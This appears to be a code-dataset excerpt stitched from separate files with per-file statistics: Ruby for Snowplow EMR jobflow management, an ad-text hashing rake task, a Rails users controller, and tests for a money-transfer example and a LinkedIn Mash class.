    raise EmrExecutionError, get_failure_details(jobflow_id, cluster_status, cluster_step_status_for_run)
  end
  # Transient clusters are always terminated once the run completes successfully
  retry_connection_issues {
    @jobflow.shutdown
  }
  nil
end
# This run mode is targeted at persistent clusters.
# Initially, all steps are submitted in one batch.
# If the batch fails, then it re-submits the subset of the batch that should be retried.
#
# Parameters:
# +config+:: main Snowplow config.yml hash
#
# Raises BootstrapFailureError on a bootstrap failure; EmrExecutionError when a
# step fails and cannot be (or has exhausted being) retried.
Contract ConfigHash => nil
def run_persistent_mode(config)
  jobflow_id = @jobflow.jobflow_id
  snowplow_tracking_enabled = ! config[:monitoring][:snowplow].nil?
  if snowplow_tracking_enabled
    Monitoring::Snowplow.parameterize(config)
  end
  # The batch comprises all steps for the first attempt.
  batch = @pending_jobflow_steps
  retries = 0
  loop do
    # Timestamp scopes status lookups to this batch's steps only
    batch_tstamp = Time.new
    batch.each do |step_config|
      add_step_to_jobflow(step_config[:step], snowplow_tracking_enabled)
    end
    if snowplow_tracking_enabled
      Monitoring::Snowplow.instance.track_job_started(jobflow_id, cluster_status(@jobflow), cluster_step_status_for_run(@jobflow, batch_tstamp))
    end
    job_result = wait_for(batch_tstamp)
    output_rdb_loader_logs_for_batch(job_result, batch, config, retries)
    cluster_status = cluster_status(@jobflow)
    cluster_step_status_for_run = cluster_step_status_for_run(@jobflow, batch_tstamp)
    if snowplow_tracking_enabled
      if job_result.successful
        Monitoring::Snowplow.instance.track_job_succeeded(jobflow_id, cluster_status, cluster_step_status_for_run)
      else
        Monitoring::Snowplow.instance.track_job_failed(jobflow_id, cluster_status, cluster_step_status_for_run)
      end
    end
    if job_result.successful
      break
    end
    failure_details = get_failure_details(jobflow_id, cluster_status, cluster_step_status_for_run)
    # Bootstrap failures are never retried here
    if job_result.bootstrap_failure
      raise BootstrapFailureError, failure_details
    end
    # There was a step failure! Retry the batch if we can
    failed_step_status = cluster_step_status_for_run.detect { |s| s.state == 'FAILED' }
    if failed_step_status.nil?
      # This is unexpected: one of the steps must have failed
      raise EmrExecutionError, failure_details
    end
    logger.debug "EMR step failed: #{failed_step_status.name}"
    # Steps are matched by name between EMR status and our submitted configs
    failed_step_config = batch.detect { |s| s[:step].name == failed_step_status.name }
    if failed_step_config.nil? || !failed_step_config[:retry_on_fail]
      # The step that failed is not one that can be retried
      raise EmrExecutionError, failure_details
    end
    # The next batch is the subset of the previous batch, starting from the failed step
    next_batch = batch.drop_while { |s| s[:step].name != failed_step_status.name }
    # Increment the retries counter
    # If the previous and next batches are different lengths, then we have not yet retried this particular step. Therefore retries = 1.
    retries = next_batch.length() == batch.length() ? retries + 1 : 1
    if retries >= 3
      raise EmrExecutionError, failure_details
    end
    batch = next_batch
    logger.warn failure_details
    logger.info "Failed and cancelled steps will be resubmitted"
  end
  nil
end
# This is for persistent clusters only.
# Ensures the cluster is running before yielding, then terminates the cluster
# if it has outlived its configured duration — even when the yielded block
# raises an EmrExecutionError.
def manage_lifecycle_persistent
  # Shut the cluster down once it has exceeded @persistent_jobflow_duration_s.
  # A lambda (rather than a nested `def`) so we don't redefine an instance
  # method named `terminate` on the class every time this manager runs.
  terminate = lambda do
    status = cluster_status(@jobflow)
    if @persistent_jobflow_duration_s > 0 &&
       status.created_at + @persistent_jobflow_duration_s < Time.new
      logger.debug "EMR jobflow has expired and will be shutdown."
      retry_connection_issues {
        @jobflow.shutdown
      }
    end
  end

  # Start the jobflow if it is not already running
  if @jobflow.jobflow_id.nil?
    retry_connection_issues {
      @jobflow.run
    }
  end
  logger.debug "EMR jobflow #{@jobflow.jobflow_id} started"

  begin
    yield
    terminate.call
  rescue EmrExecutionError => e
    # Best-effort termination on failure: a shutdown error must not mask
    # the original execution error
    terminate.call rescue nil
    raise e
  end
end
# Add a single step to the EMR jobflow, tracking and wrapping any failure.
#
# Parameters:
# +jobflow_step+:: the Elasticity step to add
# +snowplow_tracking_enabled+:: whether to emit a Snowplow event on failure
Contract Elasticity::JobFlowStep, Bool => nil
def add_step_to_jobflow(jobflow_step, snowplow_tracking_enabled)
  begin
    # When the jobflow is already running, adding a step triggers an HTTP call
    retry_connection_issues { @jobflow.add_step(jobflow_step) }
  rescue => error
    # retry_connection_issues has already exhausted its retries at this point
    if snowplow_tracking_enabled
      failed_status = Elasticity::ClusterStepStatus.new
      failed_status.name = "Add step [#{jobflow_step.name}] to jobflow [#{@jobflow.jobflow_id}]. (Error: [#{error.message}])"
      failed_status.state = "FAILED"
      Monitoring::Snowplow.instance.track_single_step(failed_status)
    end
    raise EmrExecutionError, "Can't add step [#{jobflow_step.name}] to jobflow [#{@jobflow.jobflow_id}] (retried 3 times). Error: [#{error.message}]."
  end
  logger.debug "Added step to EMR jobflow: #{jobflow_step.name}"
  nil
end
Contract JobResult, ArrayOf[EmrStepConfig], ConfigHash, Num => nil
# Print RDB Loader logs for one batch of steps, at a severity matching
# how the batch ended (success -> info, loader cancelled -> warn, else error).
def output_rdb_loader_logs_for_batch(job_result, batch, config, attempt)
  # Only successful runs and RDB-Loader-specific outcomes leave logs worth printing
  relevant = job_result.successful || job_result.rdb_loader_failure || job_result.rdb_loader_cancellation
  return nil unless relevant

  log_level =
    if job_result.successful
      'info'
    elsif job_result.rdb_loader_cancellation
      'warn'
    else
      'error'
    end

  logs = batch.map { |step_config| step_config[:rdb_loader_log] }.compact
  output_rdb_loader_logs(logs, config[:aws][:s3][:region], config[:aws][:access_key_id],
                         config[:aws][:secret_access_key], log_level, attempt)
end
# Fetch logs from S3 left by RDB Loader steps and print them at the given level.
# Each processed log object is renamed (copy + delete) with an attempt suffix so
# a retried batch does not overwrite the original log.
#
# Parameters:
# +rdb_loader_logs+:: array of [target_name, s3_log_path] pairs
# +region+:: region for logs bucket
# +aws_access_key_id+:: AWS access key for the logs bucket
# +aws_secret_key+:: AWS secret key for the logs bucket
# +log_level+:: one of 'info', 'warn', 'error'
# +attempt+:: batch attempt counter, used to suffix archived log keys
Contract ArrayOf[[String, String]], String, String, String, String, Num => nil
def output_rdb_loader_logs(rdb_loader_logs, region, aws_access_key_id, aws_secret_key, log_level, attempt)
  s3 = Aws::S3::Client.new(
    :access_key_id => aws_access_key_id,
    :secret_access_key => aws_secret_key,
    :region => region)

  if rdb_loader_logs.empty? or empty?(s3, @rdb_loader_log_base)
    logger.info "No RDB Loader logs"
  else
    logger.info "RDB Loader logs"

    rdb_loader_logs.each do |l|
      tmp = Tempfile.new("rdbloader")
      bucket, key = parse_bucket_prefix(l[1])
      logger.debug "Downloading #{l[1]} to #{tmp.path}"
      begin
        s3.get_object({
          response_target: tmp,
          bucket: bucket,
          key: key,
        })
        if log_level == 'info'
          logger.info l[0]
          logger.info tmp.read
        elsif log_level == 'warn'
          logger.warn l[0]
          logger.warn tmp.read
        else
          logger.error l[0]
          logger.error tmp.read
        end
        # Cannot move an object in S3, so copy and delete
        # This prevents overwriting the original log file in case this step gets retried.
        s3.copy_object({
          bucket: bucket,
          copy_source: "/#{bucket}/#{key}",
          key: "#{key}.#{attempt}",
        })
        s3.delete_object({
          bucket: bucket,
          key: key,
        })
      # Was `rescue Exception`, which also swallowed SignalException/SystemExit;
      # StandardError keeps the best-effort behavior for ordinary failures only
      rescue StandardError => e
        logger.error "Error while downloading RDB log #{l[1]}"
        logger.error e.message
      ensure
        tmp.close
        tmp.unlink
      end
    end
  end
  nil
end
private
# Adds a step to the jobflow according to whether or not
# we are using a persistent cluster.
#
# Parameters:
# +jobflow_step+:: the step to add
# +use_persistent_jobflow+:: whether a persistent jobflow should be used
Contract EmrStepConfig, Bool => nil
def submit_jobflow_step(jobflow_step, use_persistent_jobflow)
  # A persistent cluster must survive a failed step: cancel-and-wait
  # instead of the default terminate-on-failure behavior
  jobflow_step[:step].action_on_failure = "CANCEL_AND_WAIT" if use_persistent_jobflow
  @pending_jobflow_steps.push(jobflow_step)
  nil
end
# Build an Elasticity RDB Loader step.
#
# Parameters:
# +config+:: main Snowplow config.yml
# +targets+:: list of Storage target config hashes
# +resolver+:: base64-encoded Iglu resolver JSON
# +jar+:: s3 object with RDB Loader jar
# +rdbloader_steps+:: hash with :skip / :include step lists forwarded to RDB Loader
# +skip_manifest+:: whether load_manifest RDB Loader step should be skipped
Contract ConfigHash, ArrayOf[Iglu::SelfDescribingJson], String, String, RdbLoaderSteps, Bool => ArrayOf[EmrStepConfig]
def get_rdb_loader_steps(config, targets, resolver, jar, rdbloader_steps, skip_manifest)
  # Remove credentials from the config copy shipped to the loader step
  clean_config = deep_copy(config)
  clean_config[:aws][:access_key_id] = ""
  clean_config[:aws][:secret_access_key] = ""

  default_arguments = {
    :config => Base64.strict_encode64(recursive_stringify_keys(clean_config).to_yaml),
    :resolver => build_iglu_config_json(resolver)
  }

  skip_steps = if skip_manifest then rdbloader_steps[:skip] + ["load_manifest"] else rdbloader_steps[:skip] end

  targets.map { |target|
    name = target.data[:name]
    # Unique log key so this target's loader output can be fetched afterwards
    log_key = @rdb_loader_log_base + SecureRandom.uuid
    encoded_target = Base64.strict_encode64(target.to_json.to_json)
    arguments = [
      "--config", default_arguments[:config],
      "--resolver", default_arguments[:resolver],
      "--logkey", log_key,
      "--target", encoded_target
    ] + unless skip_steps.empty?
      ["--skip", skip_steps.join(",")]
    else
      []
    end + unless rdbloader_steps[:include].empty?
      ["--include", rdbloader_steps[:include].join(",")]
    else
      []
    end

    rdb_loader_step = Elasticity::CustomJarStep.new(jar)
    rdb_loader_step.arguments = arguments
    rdb_loader_step.name = "[rdb_load] Load #{name} Storage Target"
    # (A stray no-op `rdb_loader_step` expression was removed here)
    {:step => rdb_loader_step, :retry_on_fail => false, :rdb_loader_log => [name, log_key]}
  }
end
# List bucket (enriched:good or shredded:good) and return latest run folder
#
# Parameters:
# +s3+:: AWS S3 client
# +s3_path+:: Full S3 path to folder
# +suffix+:: Suffix to check for emptiness, atomic-events in case of shredded:good
def get_latest_run_id(s3, s3_path, suffix = '')
  run_id_regex = /.*\/run=((\d|-)+)\/.*/
  # Latest object that carries a run= folder component in its key
  latest_folder = last_object_name(s3, s3_path,
    lambda { |k| !(k =~ /\$folder\$$/) and !k[run_id_regex, 1].nil? })
  run_id = latest_folder[run_id_regex, 1]

  if run_id.nil?
    logger.error "No run folders in [#{s3_path}] found"
    raise UnexpectedStateError, "No run folders in [#{s3_path}] found"
  end

  run_path = File.join(s3_path, "run=#{run_id}", suffix)
  raise NoDataToProcessError, "Cannot archive #{run_path}, no data found" if empty?(s3, run_path)
  run_id
end
# Defines a S3DistCp step for archiving enriched or shred folder
#
# Parameters:
# +good_path+:: shredded:good or enriched:good full S3 path
# +archive_path+:: enriched:archive or shredded:archive full S3 path
# +run_id_folder+:: run id foler name (2017-05-10-02-45-30, without `=run`)
# +name+:: step description to show in EMR console
# +encrypted+:: whether the destination bucket is encrypted
#
# Returns a step ready for adding to the Elasticity Jobflow.
Contract String, String, String, String, String, Bool => EmrStepConfig
def get_archive_step(good_path, archive_path, run_id_folder, s3_endpoint, name, encrypted)
  step = Elasticity::S3DistCpStep.new(legacy = @legacy)
  args = [
    "--src" , partition_by_run(good_path, run_id_folder),
    "--dest" , partition_by_run(archive_path, run_id_folder),
    "--s3Endpoint" , s3_endpoint,
    "--deleteOnSuccess",
    "--disableMultipartUpload"
  ]
  args << '--s3ServerSideEncryption' if encrypted
  step.arguments = args
  step.name = name
  {:step => step, :retry_on_fail => true, :rdb_loader_log => nil}
end
# Defines an Elasticity Scalding step.
#
# Parameters:
# +step_name+:: name of step
# +jar+:: path to the jar containing the job
# +main_class+:: Java main class to run (qualified with JAVA_PACKAGE)
# +folders+:: hash of in, good, bad, errors S3/HDFS folders
# +extra_step_args+:: additional arguments to pass to the step
#
# Returns a step ready for adding to the Elasticity Jobflow.
Contract String, String, String, Hash, Hash => Elasticity::ScaldingStep
def build_scalding_step(step_name, jar, main_class, folders, extra_step_args={})
  folder_args = {
    :input_folder      => folders[:in],
    :output_folder     => folders[:good],
    :bad_rows_folder   => folders[:bad],
    :exceptions_folder => folders[:errors]
  }
  # folders[:errors] may be absent, so drop nil-valued entries after merging
  arguments = extra_step_args.merge(folder_args).reject { |_, v| v.nil? }
  arguments['tool.partialok'] = ''
  # Now create the Hadoop MR step for the jobflow
  step = Elasticity::ScaldingStep.new(jar, "#{JAVA_PACKAGE}.#{main_class}", arguments)
  step.name = step_name
  step
end
# Defines an Elasticity Spark step.
#
# Parameters:
# +step_name+:: name of the step
# +jar+:: path to the jar containing the job
# +main_class+:: class to run (qualified with JAVA_PACKAGE)
# +folders+:: hash of input, output, bad S3/HDFS folders
# +extra_step_args+:: additional command line arguments to pass to the step
#
# Returns a step ready to be added to the Elasticity Jobflow.
Contract String, String, String, Hash, Hash => Elasticity::SparkStep
def build_spark_step(step_name, jar, main_class, folders, extra_step_args={})
  step = Elasticity::SparkStep.new(jar, "#{JAVA_PACKAGE}.#{main_class}")
  step.app_arguments = extra_step_args.merge({
    'input-folder'  => folders[:in],
    'output-folder' => folders[:good],
    'bad-folder'    => folders[:bad],
  })
  # Always submit on YARN in cluster mode
  step.spark_arguments = {
    'master' => 'yarn',
    'deploy-mode' => 'cluster'
  }
  step.name = step_name
  step
end
# Wait for a jobflow.
# Check its status every 5 minutes till it completes.
#
# Parameters:
# +earliest+:: only steps created at/after this time are considered,
#              so steps from prior runs on a persistent cluster are ignored
#
# Returns a JobResult capturing overall success plus whether the failure
# (if any) was a bootstrap failure, an RDB loader failure, or an RDB
# loader cancellation.
Contract Time => JobResult
def wait_for(earliest)
  success = false
  bootstrap_failure = false
  rdb_loader_failure = false
  rdb_loader_cancellation = false
  # Loop until we can quit...
  while true do
    # NOTE(review): the local below shadows the method of the same name; the
    # RHS (with arguments) is the method call, later bare references hit the local.
    cluster_step_status_for_run = cluster_step_status_for_run(@jobflow, earliest)
    if cluster_step_status_for_run.nil?
      # Transient API hiccup: back off for 5 minutes before retrying
      logger.warn "Could not retrieve cluster status, waiting 5 minutes before checking jobflow again"
      sleep(300)
    else
      # Count up running tasks and failures: statuses = [running_count, failed_count]
      statuses = cluster_step_status_for_run.map(&:state).inject([0, 0]) do |sum, state|
        [ sum[0] + (@@running_states.include?(state) ? 1 : 0), sum[1] + (@@failed_states.include?(state) ? 1 : 0) ]
      end
      # If no step is still running, then quit
      if statuses[0] == 0
        success = statuses[1] == 0 # True if no failures
        bootstrap_failure = EmrJob.bootstrap_failure?(@jobflow, cluster_step_status_for_run)
        rdb_loader_failure = EmrJob.rdb_loader_failure?(cluster_step_status_for_run)
        rdb_loader_cancellation = EmrJob.rdb_loader_cancellation?(cluster_step_status_for_run)
        break
      else
        # Sleep a while before we check again
        sleep(60)
      end
    end
  end
  JobResult.new(success, bootstrap_failure, rdb_loader_failure, rdb_loader_cancellation)
end
# Spaceship operator supporting nils
#
# Parameters:
# +a+:: First argument
# +b+:: Second argument
Contract Maybe[Time], Maybe[Time] => Num
def self.nilable_spaceship(a, b)
  # nil values sort after any non-nil value; two nils compare equal
  if a.nil? && b.nil?
    0
  elsif a.nil?
    1
  elsif b.nil?
    -1
  else
    a <=> b
  end
end
# Recursively change the keys of a parsed YAML value from symbols to strings.
#
# Parameters:
# +h+:: the parsed YAML value (Hash, Array or scalar)
#
# Returns a copy of +h+ in which every Hash key (at any depth) has been
# converted with +to_s+; non-collection values are returned unchanged.
# Uses case/when (is_a? semantics) instead of the original exact-class
# comparison (`h.class == [].class`), so Array/Hash subclasses are handled too.
def recursive_stringify_keys(h)
  case h
  when Array
    h.map { |item| recursive_stringify_keys(item) }
  when Hash
    h.each_with_object({}) { |(k, v), out| out[k.to_s] = recursive_stringify_keys(v) }
  else
    h
  end
end
# Produce a deep copy of +o+ by round-tripping it through Marshal.
# Only works for Marshal-serializable objects (no procs, IO, etc.).
def deep_copy(o)
  serialized = Marshal.dump(o)
  Marshal.load(serialized)
end
# Ensures we only look at the steps submitted in this run
# and not within prior persistent runs.
#
# Parameters:
# +jobflow+:: The jobflow to extract steps from
# +earliest+:: steps created before this time are dropped
#
# Returns the matching step statuses, oldest first.
Contract Elasticity::JobFlow, Time => ArrayOf[Elasticity::ClusterStepStatus]
def cluster_step_status_for_run(jobflow, earliest)
  retry_connection_issues do
    statuses = jobflow.cluster_step_status
    statuses
      .select { |status| status.created_at >= earliest }
      .sort_by(&:created_at)
  end
end
Contract Elasticity::JobFlow => Elasticity::ClusterStatus
# Fetch the cluster status, retrying transient connection problems.
def cluster_status(jobflow)
  retry_connection_issues do
    jobflow.cluster_status
  end
end
# Returns true if the jobflow failed at a rdb loader step
Contract ArrayOf[Elasticity::ClusterStepStatus] => Bool
def self.rdb_loader_failure?(cluster_step_statuses)
  # RDB loader steps are named "... Storage Target" (see get_rdb_loader_step)
  cluster_step_statuses.any? do |status|
    status.state == 'FAILED' && status.name =~ /Storage Target/
  end
end
# Returns true if the rdb loader step was cancelled
Contract ArrayOf[Elasticity::ClusterStepStatus] => Bool
def self.rdb_loader_cancellation?(cluster_step_statuses)
  # A cancelled "... Storage Target" step means loading was aborted upstream
  cluster_step_statuses.any? do |status|
    status.state == 'CANCELLED' && status.name =~ /Storage Target/
  end
end
# Returns true if the jobflow seems to have failed due to a bootstrap failure
Contract Elasticity::JobFlow, ArrayOf[Elasticity::ClusterStepStatus] => Bool
def self.bootstrap_failure?(jobflow, cluster_step_statuses)
  indicator = /BOOTSTRAP_FAILURE|bootstrap action|Master instance startup failed/
  # Short-circuit first: cluster_status is a remote call and is only made
  # when every step in the run was cancelled
  return false unless cluster_step_statuses.all? { |status| status.state == 'CANCELLED' }
  !(jobflow.cluster_status.last_state_change_reason =~ indicator).nil?
end
Contract ArrayOf[String], String, String => EmrStepConfig
# Builds a script-runner step that recursively removes the given HDFS/S3
# locations using the hosted snowplow-hadoop-fs-rmr helper script.
def get_rmr_step(locations, bucket, description)
  script_runner = "s3://#{@jobflow.region}.elasticmapreduce/libs/script-runner/script-runner.jar"
  step = Elasticity::CustomJarStep.new(script_runner)
  step.arguments = ["#{bucket}common/emr/snowplow-hadoop-fs-rmr-0.2.0.sh"] + locations
  step.name = "[cleanup] #{description}"
  {:step => step, :retry_on_fail => true, :rdb_loader_log => nil}
end
# Builds a command-runner step that empties the HDFS trash on the cluster.
def get_hdfs_expunge_step
  step = Elasticity::CustomJarStep.new("command-runner.jar")
  step.arguments = ["hdfs", "dfs", "-expunge"]
  step.name = "[cleanup] Empty HDFS trash"
  {:step => step, :retry_on_fail => true, :rdb_loader_log => nil}
end
Contract TargetsHash => Maybe[String]
def get_processing_manifest(targets)
  # Only ENRICHED_EVENTS targets can carry a processing manifest config;
  # return the DynamoDB table name of the first one that does, or nil
  targets[:ENRICHED_EVENTS]
    .reject { |t| t.data[:processingManifest].nil? }
    .map { |t| t.data.dig(:processingManifest, :amazonDynamoDb, :tableName) }
    .first
end
Contract ConfigHash, ArrayOf[Iglu::SelfDescribingJson] => Hash
# Picks the first supported Redshift target (redshift_config, schema model
# >= 4) and, when the configured RDB shredder is new enough to emit TSV,
# returns it base64-encoded for the shred step; otherwise an empty hash.
def get_rdb_shredder_target(config, targets)
  supported = targets.select do |target_config|
    schema = target_config.schema
    schema.name == 'redshift_config' && schema.version.model >= 4
  end
  shredder_version = Gem::Version.new(config[:storage][:versions][:rdb_shredder])
  return {} if supported.empty? || shredder_version < SHRED_JOB_WITH_TSV_OUTPUT
  # Double to_json is deliberate: the JSON document is embedded as a string
  { 'target' => Base64.strict_encode64(supported.first.to_json.to_json) }
end
end
end
end
| 43.804614 | 253 | 0.620225 |
38b058a3c88d137b80cf250d1d9784b3f28b3755 | 777 | require 'test_helper'
require_relative '../examples/money_transfer'
# Tests for the TransferMoney context (see examples/money_transfer).
class TransferMoneyTest < MiniTest::Test
  def setup
    # Fresh accounts per test: A1 starts at 50, B2 at 100
    @account1 = Account['A1', 50]
    @account2 = Account['B2', 100]
  end

  def test_deposit
    context = TransferMoney[to: @account1]
    context.deposit(10)
    assert_equal 60, @account1.balance
  end

  def test_withdraw
    context = TransferMoney[from: @account1]
    context.withdraw(10)
    assert_equal 40, @account1.balance
  end

  def test_withdraw_above_balance
    # Withdrawing more than the balance must raise with a clear message
    error = assert_raises(NotEnoughFund) do
      TransferMoney[from: @account1].withdraw(60)
    end
    assert_equal "Balance is below amount.", error.message
  end

  def test_call
    # Calling the context moves the amount between the two accounts
    TransferMoney[from: @account1, to: @account2].(amount: 50)
    assert_equal 0, @account1.balance
    assert_equal 150, @account2.balance
  end
end
| 25.064516 | 88 | 0.725869 |
61c2fd2abe6e9da49dac53a2e6980d91925f37d1 | 37 | desc_ru=Сервер баз данных PostgreSQL
| 18.5 | 36 | 0.864865 |
e2cb6e5d809a72151c4346f281473c5470b49e0d | 5,642 | require 'digest'
# gotta make sure that `clean_text` is the same for ads from both sources. that's the whole point. see below for examples for checking.
# Ad.where("text ilike '%Charlotte on%'").first.text
# => "Let's get organized! Team Warren will convene a volunteer training in Charlotte on Tuesday, October 1. \n\nJoin us to learn more about how to spread Elizabeth’s vision for big, structural change."
# irb(main):022:0> FbpacAd.where("message ilike '%Charlotte on%'").where(advertiser: "Elizabeth Warren").first.message
# => "<p>Let's get organized! Team Warren will convene a volunteer training in Charlotte on Tuesday, October 1. </p><p> Join us to learn more about how to spread Elizabeth’s vision for big, structural change.</p>"
# irb(main):023:0> FbpacAd.where("message ilike '%Charlotte on%'").where(advertiser: "Elizabeth Warren").first.clean_text
# => "lets get organized team warren will convene a volunteer training in charlotte on tuesday october 1 join us to learn more about how to spread elizabeths vision for big structural change"
# irb(main):024:0> Ad.where("text ilike '%Charlotte on%'").first.clean_text
# => "lets get organized team warren will convene a volunteer training in charlotte on tuesday october 1 join us to learn more about how to spread elizabeths vision for big structural change"
# wilderness project, UNICEF, etc.
BORING_ADVERTISERS = [73970658023, 54684090291, 81517275796, 33110852384, 15239367801, 11131463701]
namespace :text do
task clear: :environment do
WritableAd.update_all(text_hash: nil)
end
task ads: :environment do
start = Time.now
def top_advertiser_page_ids
most_recent_lifelong_report_id = AdArchiveReport.where(kind: 'lifelong', loaded: true).order(:scrape_date).last.id
starting_point_id = AdArchiveReport.starting_point.id
top_advertiser_page_ids = ActiveRecord::Base.connection.exec_query("select start.page_id, start.page_name, current_sum_amount_spent - start_sum_amount_spent from
(SELECT ad_archive_report_pages.page_id as page_id,
ad_archive_report_pages.page_name,
sum(amount_spent) current_sum_amount_spent
FROM ad_archive_report_pages
WHERE ad_archive_report_pages.ad_archive_report_id = #{most_recent_lifelong_report_id}
GROUP BY page_id, page_name) current JOIN (SELECT ad_archive_report_pages.page_id as page_id,
ad_archive_report_pages.page_name,
sum(amount_spent) start_sum_amount_spent
FROM ad_archive_report_pages
WHERE ad_archive_report_pages.ad_archive_report_id = #{starting_point_id}
GROUP BY page_id, page_name) start on start.page_id = current.page_id order by current_sum_amount_spent - start_sum_amount_spent desc limit 10 "
).rows.map(&:first)
top_advertiser_page_ids - BORING_ADVERTISERS
end
new_ads = Ad.left_outer_joins(:writable_ad).where(writable_ads: {archive_id: nil}). # ads that don't have a writable ad or whose writable ad doesn't have a text hash in it
# where(page_id: top_advertiser_page_ids) # FOR NOW, limited to the top handful of advertisers
where("ad_creation_time > now() - interval '7 days'")
ads_without_text_hash = WritableAd.where("text_hash is null and archive_id is not null")
ads_hashed = 0
batch_size = 5000
new_ads.find_in_batches(batch_size: batch_size).map do |batch|
puts "batch (new ads)"
batch.map(&:create_writable_ad!).each do |wad|
wad.ad_text = wad.ad&.create_ad_text!(wad)
wad.save
ads_hashed += 1
end
end
ads_without_text_hash.find_in_batches(batch_size: batch_size).each do |batch|
puts "batch (ads w/o text hash)"
batch.each do |wad|
wad.ad_text = wad.ad.create_ad_text!(wad)
wad.save
ads_hashed += 1
end
end
job = Job.find_by(name: "text:ads")
job_run = job.job_runs.create({
start_time: start,
end_time: Time.now,
success: true,
})
# RestClient.post(
# ENV["SLACKWH"],
# JSON.dump({"text" => "(4/6): text hashing for FB API ads went swimmingly. (#{ads_hashed} ads hashed)" }),
# {:content_type => "application/json"}
# ) if ads_hashed > 0 && ENV["SLACKWH"]
end
task fbpac_ads: ["page_ids:fbpac_ads", :environment] do
# eventually this'll be done by the ad catcher, with ATI (but for "collector ads", obvi)
# writable_ad should be created for EVERY new ad.
counter = 0
start = Time.now
batch_size = 500
FbpacAd.left_outer_joins(:writable_ad).where(writable_ads: {ad_id: nil}).find_in_batches(batch_size: batch_size).each do |new_ads|
counter += 1
puts batch_size * counter
new_ads.each(&:create_writable_ad!)
end
WritableAd.where("text_hash is null and ad_id is not null").find_in_batches(batch_size: batch_size).each do |ads_without_text_hash|
ads_without_text_hash.each do |wad|
wad.text_hash = Digest::SHA1.hexdigest(wad.fbpac_ad.clean_text)
wad.ad_text = create_ad_text!(wad)
wad.save!
end
end
job = Job.find_by(name: "text:fbpac_ads")
job_run = job.job_runs.create({
start_time: start,
end_time: Time.now,
success: true,
})
# RestClient.post(
# ENV["SLACKWH"],
# JSON.dump({"text" => "(3/6): text hashing for collector ads went swimmingly. (#{counter} batches processed)" }),
# {:content_type => "application/json"}
# ) if ENV["SLACKWH"]
end
end
| 47.813559 | 213 | 0.688231 |
ac1898b14035803ede5275be0e45de443670db8f | 1,501 | class UsersController < ApplicationController
before_action :logged_in_user, only: [:index, :edit, :update, :destroy]
before_action :correct_user, only: [:edit, :update]
before_action :admin_user, only: :destroy
def index
@users = User.where(activated: true).paginate(page: params[:page])
end
def show
@user = User.find(params[:id])
redirect_to root_url and return unless @user.activated?
end
def new
@user = User.new
end
def create
@user = User.new(user_params)
if @user.save
@user.send_activation_email
flash[:info] = "アカウント有効化のメールを送信しました"
redirect_to root_url
else
render 'new'
end
end
def edit
end
def update
if @user.update_attributes(user_params)
flash[:success] = "プロフィールが更新されました"
redirect_to @user
else
render 'edit'
end
end
def destroy
User.find(params[:id]).destroy
flash[:success] = "ユーザーを削除しました"
redirect_to users_url
end
private
def user_params
params.require(:user).permit(:name, :email, :password, :password_confirmation)
end
#beforeアクション
#ログイン済みユーザーか確認
def logged_in_user
unless logged_in?
store_location
flash[:danger] = "ログインしてください"
redirect_to login_url
end
end
def correct_user
@user = User.find(params[:id])
redirect_to(root_url) unless current_user?(@user)
end
def admin_user
redirect_to(root_url) unless current_user.admin?
end
end
| 20.561644 | 84 | 0.660227 |
08021e39841a2e2bcf7a1b9244dd003f97d99755 | 2,927 | require 'helper'
describe LinkedIn::Mash do
describe ".from_json" do
it "should convert a json string to a Mash" do
json_string = "{\"name\":\"Josh Kalderimis\"}"
mash = LinkedIn::Mash.from_json(json_string)
mash.should have_key('name')
mash.name.should == 'Josh Kalderimis'
end
end
describe "#convert_keys" do
let(:mash) do
LinkedIn::Mash.new({
'firstName' => 'Josh',
'LastName' => 'Kalderimis',
'_key' => 1234,
'id' => 1345,
'_total' => 1234,
'values' => {},
'numResults' => 'total_results'
})
end
it "should convert camal cased hash keys to underscores" do
mash.should have_key('first_name')
mash.should have_key('last_name')
end
# this breaks data coming back from linkedIn
it "converts _key to id if there is an id column" do
mash._key.should == 1234
mash.id.should == 1345
end
context 'no collision' do
let(:mash) {
LinkedIn::Mash.new({
'_key' => 1234
})
}
it 'converts _key to id if there is no collision' do
mash.id.should == 1234
mash._key.should == 1234
end
end
it "should convert the key _total to total" do
mash.should have_key('total')
end
it "should convert the key values to all" do
mash.should have_key('all')
end
it "should convert the key numResults to total_results" do
mash.should have_key('total_results')
end
end
describe '#timestamp' do
it "should return a valid Time if a key of timestamp exists and the value is an int" do
time_mash = LinkedIn::Mash.new({ 'timestamp' => 1297083249 })
time_mash.timestamp.should be_a_kind_of(Time)
time_mash.timestamp.to_i.should == 1297083249
end
it "should return a valid Time if a key of timestamp exists and the value is an int which is greater than 9999999999" do
time_mash = LinkedIn::Mash.new({ 'timestamp' => 1297083249 * 1000 })
time_mash.timestamp.should be_a_kind_of(Time)
time_mash.timestamp.to_i.should == 1297083249
end
it "should not try to convert to a Time object if the value isn't an Integer" do
time_mash = LinkedIn::Mash.new({ 'timestamp' => 'Foo' })
time_mash.timestamp.class.should be String
end
end
describe "#to_date" do
let(:date_mash) do
LinkedIn::Mash.new({
'year' => 2010,
'month' => 06,
'day' => 23
})
end
it "should return a valid Date if the keys year, month, day all exist" do
date_mash.to_date.should == Date.civil(2010, 06, 23)
end
end
describe "#all" do
let(:all_mash) do
LinkedIn::Mash.new({
:values => nil
})
end
it "should return an empty array if values is nil due to no results being found for a query" do
all_mash.all.should == []
end
end
end
| 25.675439 | 124 | 0.611889 |
285d7e51a2d401a79051444d09cef0c8936d6029 | 269 | class PopulateMemberRoles < ActiveRecord::Migration
def self.up
MemberRole.delete_all
Member.all.each do |member|
MemberRole.create!(:member_id => member.id, :role_id => member.role_id)
end
end
def self.down
MemberRole.delete_all
end
end
| 20.692308 | 77 | 0.710037 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.